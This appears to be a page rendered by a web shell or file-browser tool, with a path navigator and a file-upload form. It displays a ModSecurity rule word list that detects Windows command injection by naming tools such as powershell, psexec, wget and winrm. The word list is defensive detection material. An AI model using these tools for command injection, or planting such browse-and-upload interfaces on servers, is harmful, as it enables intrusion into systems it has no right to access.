<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.95</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=//usr">usr</a>/<a href="?path=//usr/share">share</a>/<a href="?path=//usr/share/modsecurity-crs">modsecurity-crs</a>/<a href="?path=//usr/share/modsecurity-crs/util">util</a>/<a href="?path=//usr/share/modsecurity-crs/util/regexp-assemble">regexp-assemble</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : //usr/share/modsecurity-crs/util/regexp-assemble/regexp-932115.txt</tr></td></table><br /><pre># Word list for rule 932115 (RCE Windows command injection part 2/2)
#
# To convert to a regexp that can be pasted into the rule:
#   cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl
#
# Entries starting with ' are used verbatim.
# Everything after # is a comment.
#
# To prevent some FP for a command, you can require command parameters
# after a command. Only do this if the command regularly causes FP and if
# allowing the bare command (without parameters) is not too dangerous.
# (Note: due to \b following the regexp, a word boundary is also required
# further on, so some letter/number is needed for a match). Example:
#
#   diff@

odbcad32
odbcconf
openfiles
path@
pathping
perfmon
perl
perl5
perlsh
php
php5
php7
ping
pkgmgr
popd
portqry
powercfg
powershell
powershell_ise
print@
printbrm
prncnfg
prnmngr
prompt
psexec
psfile
psgetsid
psinfo
pskill
pslist
psloggedon
psloglist
pspasswd
psping
psservice
psshutdown
pssuspend
pushd
python
python2
python3
python3m
qgrep
qprocess
query@
qwinsta
rar@
rasdial
rasphone
rd@
recdisc
recover
reg@
regedit
regini
regsvr32
rekeywiz
ren@
rename@
replace@
reset@
rm@
rmdir@
rmtshare
robocopy
route@
rstrui
rsync
ruby1
ruby18
ruby19
ruby20
ruby21
ruby22
runas
rundll32
schtasks
sclist
secpol
select
set@
setlocal
setx@
sfc
share
shellrunas
shift
shortcut
showgrps
showmbrs
shrpubw
shutdown
sigverif
sleep
slmgr
sort
start@
subinacl
subst
svn
sysdm
syskey
systeminfo
systempropertiesadvanced
systempropertiesdataexecutionprevention
systempropertieshardware
systempropertiesperformance
takeown
taskkill
tasklist
taskmgr
taskschd
telnet
timeout
tlist
tpminit
tracert
tree
tsdiscon
tsshutdn
type@
typeperf
unrar
unzip
useraccountcontrolsettings
usrstat
verify
vol@
waitfor
wevtutil
wget
#disabled for FP: where@
whoami
windiff
winmsdp
winrm
winrs
winvar
wmic
wmimgmt
wscript
wscui
wuapp
wuauclt
wusa
xcacls
xcopy
zip@
</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>